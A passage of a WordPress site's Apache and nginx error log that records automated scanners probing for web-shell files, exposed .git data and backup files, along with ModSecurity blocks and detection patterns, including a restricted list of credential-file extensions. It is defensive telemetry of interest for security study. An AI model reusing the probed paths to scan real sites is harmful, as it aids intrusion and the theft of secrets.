/home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/22 07:42:50 [error] 32709#32709: *381344 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 52.169.88.234, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Sat Mar 22 07:42:54.935818 2025] [:error] [pid 32744:tid 140515064366848] [client 52.169.88.234:38502] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Mar 22 07:43:00.508959 2025] [autoindex:error] [pid 900:tid 140515072759552] [client 52.169.88.234:38516] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/sitemaps/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:43:04.718630 2025] [:error] [pid 32744:tid 140515139901184] [client 52.169.88.234:38526] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/makeasmtp.php [Sat Mar 22 07:43:07.684540 2025] [:error] [pid 900:tid 140515047581440] [client 52.169.88.234:38534] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xleet.php [Sat Mar 22 07:43:19.808257 2025] [autoindex:error] [pid 32746:tid 140515014010624] [client 52.169.88.234:38562] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/skins/lightgray/img/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:43:20.662995 2025] [autoindex:error] [pid 32746:tid 140515256313600] [client 52.169.88.234:38566] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/widgets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:43:31.149527 2025] [autoindex:error] [pid 32744:tid 140515022403328] [client 52.169.88.234:38592] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:43:38.479668 2025] [autoindex:error] [pid 900:tid 140515239528192] [client 52.169.88.234:38610] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:43:51.923653 2025] [:error] [pid 32744:tid 140515039188736] [client 52.169.88.234:38646] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/wp-config.php [Sat Mar 22 07:43:57.875720 2025] [autoindex:error] [pid 32745:tid 140515239528192] [client 52.169.88.234:38664] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:04.980003 2025] [autoindex:error] [pid 900:tid 140514997225216] [client 52.169.88.234:38680] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:11.208534 2025] [:error] [pid 32746:tid 140515123115776] [client 52.169.88.234:38698] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Mar 22 07:44:27.800753 2025] [autoindex:error] [pid 32746:tid 140515131508480] [client 52.169.88.234:38740] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:28.734207 2025] [:error] [pid 32746:tid 140515106330368] [client 52.169.88.234:38744] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Sat Mar 22 07:44:29.568067 2025] [autoindex:error] [pid 900:tid 140515081152256] [client 52.169.88.234:38750] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:34.216155 2025] [:error] [pid 32746:tid 140515055974144] [client 52.169.88.234:38762] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Sat Mar 22 07:44:40.557221 2025] [autoindex:error] [pid 32746:tid 140514988832512] [client 52.169.88.234:38784] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:42.928599 2025] [autoindex:error] [pid 32744:tid 140515256313600] [client 52.169.88.234:38792] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:46.573851 2025] [autoindex:error] [pid 900:tid 140515239528192] [client 52.169.88.234:38802] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 07:44:47.649295 2025] [:error] [pid 32746:tid 140515123115776] [client 52.169.88.234:38806] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/radio.php [Sat Mar 22 07:44:55.758640 2025] [autoindex:error] [pid 32746:tid 140515039188736] [client 52.169.88.234:38828] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2025/03/22 08:51:35 [error] 32709#32709: *382500 access forbidden by rule, client: 170.39.218.36, server: investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "investigacionperu.com" [Sat Mar 22 08:52:03.107429 2025] [:error] [pid 900:tid 140515030796032] [client 170.39.218.36:40508] [client 170.39.218.36] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/env.backup"] [unique_id "Z97AgyECWYKR5xCch_rxRAAAANI"] [Sat Mar 22 09:27:47.141318 2025] [:error] [pid 900:tid 140514997225216] [client 140.245.43.10:41714] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Sat Mar 22 09:27:59.685022 2025] [:error] [pid 32744:tid 140515106330368] [client 140.245.43.10:41760] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Sat Mar 22 09:27:59.908343 2025] [:error] [pid 32745:tid 140515256313600] [client 140.245.43.10:41764] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/atomlib.php [Sat Mar 22 09:28:27.775517 2025] [:error] [pid 32746:tid 140515139901184] [client 140.245.43.10:41868] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Sat Mar 22 09:29:45.465434 2025] [:error] [pid 32746:tid 140515106330368] [client 140.245.43.10:42260] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/class_api.php [Sat Mar 22 09:30:13.500107 2025] [:error] [pid 900:tid 140515047581440] [client 140.245.43.10:42356] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/mariju.php [Sat Mar 22 09:49:47.702983 2025] [:error] [pid 900:tid 140515081152256] [client 190.114.241.127:42944] [client 190.114.241.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\A|[^\\\\d])0x[a-f\\\\d]{3,}[a-f\\\\d]*)+" at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "55"] [id "981260"] [rev "2"] [msg "SQL Hex Encoding Identified"] [data "Matched Data: e0x1c8c5b6ade found within XML: metaWeblog.newPost1test01test01title0x1c8c5b6adescription0x1c8c5b6amt_keywords0x1c8c5b6amt_excerpt0x1c8c5b6a1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z97OCyECWYKR5xCch_rzDgAAAMw"] [Sat Mar 22 11:47:40.632666 2025] [authz_core:error] [pid 32746:tid 140515156686592] [client 64.227.70.2:44264] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/22 11:47:48 [error] 32709#32709: *385164 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Sat Mar 22 14:26:01.531743 2025] [autoindex:error] [pid 900:tid 140515097937664] [client 13.79.17.110:47952] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:26:04.908555 2025] [:error] [pid 900:tid 140515039188736] [client 13.79.17.110:47960] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Mar 22 14:26:06.037407 2025] [:error] [pid 900:tid 140515156686592] [client 13.79.17.110:47964] PHP Fatal error: Uncaught Error: Call to undefined function add_action() in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php:147 [Sat Mar 22 14:26:06.037524 2025] [:error] [pid 900:tid 140515156686592] [client 13.79.17.110:47964] Stack trace: [Sat Mar 22 14:26:06.037543 2025] [:error] [pid 900:tid 140515156686592] [client 13.79.17.110:47964] #0 {main} [Sat Mar 22 14:26:06.037655 2025] [:error] [pid 900:tid 140515156686592] [client 13.79.17.110:47964] thrown in /home/investig/public_html/wp-content/themes/twentytwenty/functions.php on line 147 [Sat Mar 22 14:26:38.797354 2025] [autoindex:error] [pid 32746:tid 140515014010624] [client 13.79.17.110:48034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:26:51.834305 2025] [autoindex:error] [pid 32745:tid 140515123115776] [client 13.79.17.110:48064] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:27:06.030957 2025] [autoindex:error] [pid 32746:tid 140515072759552] [client 13.79.17.110:48096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:27:20.583700 2025] [autoindex:error] [pid 900:tid 140515123115776] [client 13.79.17.110:48130] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:27:31.870632 2025] [:error] [pid 32744:tid 140514980439808] [client 13.79.17.110:48158] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Sat Mar 22 14:27:44.998397 2025] [:error] [pid 32746:tid 140515081152256] [client 13.79.17.110:48192] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/dropdown.php [Sat Mar 22 14:27:50.342354 2025] [autoindex:error] [pid 32745:tid 140515106330368] [client 13.79.17.110:48206] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/home-link/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:28:11.688832 2025] [autoindex:error] [pid 900:tid 140514997225216] [client 13.79.17.110:48256] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:28:18.109907 2025] [:error] [pid 32745:tid 140514980439808] [client 13.79.17.110:48276] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xleet.php [Sat Mar 22 14:28:19.068778 2025] [autoindex:error] [pid 900:tid 140515072759552] [client 13.79.17.110:48280] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:28:20.047612 2025] [autoindex:error] [pid 900:tid 140515081152256] [client 13.79.17.110:48284] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:28:21.928943 2025] [:error] [pid 32745:tid 140515114723072] [client 13.79.17.110:48290] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Sat Mar 22 14:28:44.655269 2025] [:error] [pid 32746:tid 140515131508480] [client 13.79.17.110:48346] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Sat Mar 22 14:29:04.448469 2025] [autoindex:error] [pid 900:tid 140515055974144] [client 13.79.17.110:48394] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:29:09.094771 2025] [:error] [pid 900:tid 140515030796032] [client 13.79.17.110:48406] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Sat Mar 22 14:29:21.194610 2025] [autoindex:error] [pid 32746:tid 140515055974144] [client 13.79.17.110:48436] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Sat Mar 22 14:29:22.963754 2025] [:error] [pid 32746:tid 140515064366848] [client 13.79.17.110:48442] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Sat Mar 22 15:17:08.773120 2025] [authz_core:error] [pid 32746:tid 140515022403328] [client 64.227.70.2:49274] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2025/03/22 15:17:15 [error] 32709#32709: *387997 access forbidden by rule, client: 64.227.70.2, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "investigacionperu.com" [Sat Mar 22 19:56:23.803473 2025] [:error] [pid 900:tid 140515106330368] [client 193.189.100.197:53724] [client 193.189.100.197] ModSecurity: Access denied with code 403 (phase 2). Invalid URL Encoding: Non-hexadecimal digits used at XML. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_20_protocol_violations.conf"] [line "468"] [id "950108"] [rev "2"] [msg "URL Encoding Abuse Attack Attempt"] [severity "WARNING"] [ver "OWASP_CRS/2.2.9"] [maturity "6"] [accuracy "8"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/EVASION"] [hostname "investigacionperu.com"] [uri "/xmlrpc.php"] [unique_id "Z99cNyECWYKR5xCch_r5tQAAAMk"], referer: https://investigacionperu.com/ [Sun Mar 23 15:06:37.029049 2025] [autoindex:error] [pid 22248:tid 139922040121088] [client 74.225.152.45:43808] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com 2025/03/24 00:22:49 [error] 22208#22208: *411666 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:03 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:03 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/ORIG_HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/description HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:09 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:15 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/index HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/heads/master HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/refs/remotes/origin/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/objects/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/packed-refs HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:16 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:22 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:22 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:22 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:23:22 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:25:48 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/logs/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:25:48 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/info/exclude HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:12 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/heads/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:13 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-push HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:28 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/remotes/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:29 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/pre-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:29 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:48 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/FETCH_HEAD HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:26:58 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/stash HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:27:11 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/hooks/post-commit HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:27:30 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/COMMIT_EDITMSG HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:27:36 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/refs/tags/ HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:27:49 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "cpanel.investigacionperu.com" 2025/03/24 00:27:54 [error] 22208#22208: *411667 access forbidden by rule, client: 170.39.218.246, server: cpanel.investigacionperu.com, request: "GET 